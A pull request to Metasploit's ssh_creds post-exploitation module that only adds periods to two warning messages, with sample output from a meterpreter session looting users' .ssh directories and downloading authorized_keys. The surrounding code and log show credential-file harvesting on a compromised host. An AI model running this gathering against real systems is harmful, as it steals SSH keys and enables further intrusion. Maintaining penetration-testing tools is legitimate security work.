### PR TITLE
post/multi/gather/ssh_creds should verify it has access to a file before reading it

### DIFF
--- a/modules/post/multi/gather/ssh_creds.rb
+++ b/modules/post/multi/gather/ssh_creds.rb
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Post
       path.chomp!
       print_status("Looting #{path} directory")
       if cmd_exec("test -x #{path} || echo false").include? 'false'
-        print_warning("Can not access the directory. Missing execute bit. Skipping")
+        print_warning("Can not access the directory. Missing execute bit. Skipping.")
         next
       end
 
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Post
       files.each do |file|
         next if [".", ".."].include?(file)
         if cmd_exec("test -r #{path}#{sep}#{file} || echo false").include? 'false'
-          print_warning("Can not read file: #{path}#{sep}#{file} . Missing read permission. Skipping")
+          print_warning("Can not read file: #{path}#{sep}#{file} . Missing read permission. Skipping.")
           next
         end
         data = read_file("#{path}#{sep}#{file}")


### PR DESCRIPTION
See #12609 .

Results:
[*] Running post/multi/gather/ssh_creds on meterpreter session 1 (10.28.175.104)
[*] Finding .ssh directories
[*] Found 3 .ssh directories
[*] Looting /home/fox/.ssh directory
[+] Downloaded /home/fox/.ssh/authorized_keys -> /root/.msf4/loot/20191120081932_default_10.28.175.104_ssh.authorized_k_926574.txt
[*] Looting /home/nagios/.ssh directory
[!] Can not access the directory. Missing execute bit. Skipping.
[*] Looting /home/vaclav/.ssh directory
[!] Can not access the directory. Missing execute bit. Skipping.

or Scenario: removed read permission of fox's .ssh/authorized_keys file

[*] Running post/multi/gather/ssh_creds on meterpreter session 1 (10.28.175.104)
[*] Finding .ssh directories
[*] Found 3 .ssh directories
[*] Looting /home/fox/.ssh directory
[!] Can not read file: /home/fox/.ssh/authorized_keys . Missing read permission. Skipping.
[*] Looting /home/nagios/.ssh directory
[!] Can not access the directory. Missing execute bit. Skipping.
[*] Looting /home/vaclav/.ssh directory
[!] Can not access the directory. Missing execute bit. Skipping.